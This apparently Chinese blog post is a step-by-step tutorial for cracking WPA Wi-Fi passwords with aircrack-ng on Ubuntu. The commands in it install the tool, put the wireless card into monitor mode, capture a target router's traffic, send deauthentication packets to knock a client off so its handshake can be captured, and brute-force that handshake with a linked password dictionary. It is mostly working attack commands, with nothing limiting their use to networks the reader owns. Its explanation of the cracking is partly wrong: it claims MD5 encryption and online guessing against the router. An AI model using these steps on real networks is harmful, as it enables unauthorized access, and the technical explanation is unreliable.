Ubuntu下用aircrack破解WIFI密码

系统平台:Ubuntu15.04

工       具:aircrack1.2    密码字典(链接: http://pan.baidu.com/s/1nuDVqwL 密码: wj1e)(如果失效可以联系我)

1、aircrack获取

(1)安装aircrack

下载地址:http://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz

命令为 wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz

        在网页中下载也行

        下载下来的是一个压缩包,利用命令

         tar -zxvf aircrack-ng-1.2-beta1.tar.gz解压压缩包(aircrack-ng-1.2-beta1.tar.gz 是你下载的压缩包的文件名)

         然后用make和make INSTALL安装

         完整代码

    <span style="color:#33cc00;">     </span><span style="color:#006600;">wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc2.tar.gz
         tar -zxvf aircrack-ng-1.2-beta1.tar.gz
        cd aircrack-ng-1.2-beta1
        make
        make INSTALL</span>
        安装完成之后输入air按下两次tab补全,如果出现以下命令说明安装成功

        

        注意:如果并未出现相关命令可以进入安装包目录尝试

        (2)配置

        安装组件只要输入

  sudo apt-get install build-essential libssl-dev pkg-config libnl-3-dev libnl-genl-3-dev

即可

2、wifi破解密码

破解密码的原理是将本机的网卡更改为监听模式监听周围的wifi网络,寻找到目标的MAC地址,然后模拟客户机向对方路由器发送断开链接的请求,而路由器在断开连接的时候会自动链接,这个时候截获路由器的握手包即可,密码文件就包含在其中,之后利用密码字典破解。路由器密码的加密算法一般是MD5等,并且是不可逆的意思是无法从密文揭秘出密码,我们做的是暴力破解,将字典中的密码发送给路由器直到成功为止,所以成功与否和你的密码字典丰富度有关。

(1)、关闭网络和会影响到破解的进程

如果不进行这一步,在进行网络监听的时候会无法获得正确的信息

关闭网络功能

service net-manager stop

关闭相关进程

sudo airmon-ng check kill

(2)、打开网络监听

iwconfig    命令查看本机的网卡,可以看到我的电脑上有一块无线网卡wlan0

打开网络监听

airmon-ng start wlan0

wlan0为你选择的网卡的名称,并且我们可以在右下角看到接口名

(3)监听网络wifi

监听所有wifi(这个窗口可以关掉)

sudo airodump-ng mon0

可以看到周围的网络的一些信息,我们要用到的是BSSID,CH,ESSID。BSSID是路由器的MAC地址,CH是路由器wifi所在的频道,ESSID为WIFI的名字。

监听特定的频道

sudo airodump-ng --bssid EC:X:X:X:X:A4 -c 11 -w ./crack/tmp mon0

其中--bssid后的EC:X:X:X:X:A4是我们在上一条命令中读取到的MAC地址;

--c后面的参数是频道

--w后是要写入的文件名称(我写在当前目录下的crack目录中的tmp文件中)

mon0为之前使用到的接口名称

这个窗口不要关闭,也不要结束进程

BSSID下面是我们选定的路由器的MAC地址,STATION下面是链接在路由器上的MAC地址,我们要用到这两个

(4)获取握手包

获取握手数据包,新开一个终端,执行

sudo aireplay-ng -0 2 -a EC:X:X:X:X:A4 -c 04:X:X:X:X:37 mon0

-a后面的参数是我们选择的路由器的MAC地址

-c后面的参数是对应的客户机的MAC地址

当上一步时间后面出现WAP handshake时说明获取成功(图中绿色区域)

这个步骤要尝试多次,而且只要出现WAP handshake即可,因为有时候他只会出现很短的时间

(5)破解密码

当出现WPA handshake时表示握手成功即可破解文件

如下为获取的握手包文件

然后执行

aircrack-ng -w 1.txt tmp-02.cap

1.txt为密码字典文件

tmp-02.cap为握手文件

这个过程需要等待,执行速度和计算机的性能有关,可能并不能发现密码,可以多换几个密码字典尝试

图中可以看出KEY FOUND!后面是wifi的密码3203203203

3、善后

执行下面两条命令

关闭网络监听

airmon-ng stop mon0

打开网络

service network-manager start

这个破解方法很有局限性只能破解常规型密码,如果发现更强大的放大我会再发文章的!

如果文章中出现了错误,很高兴帮忙指出来!

评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值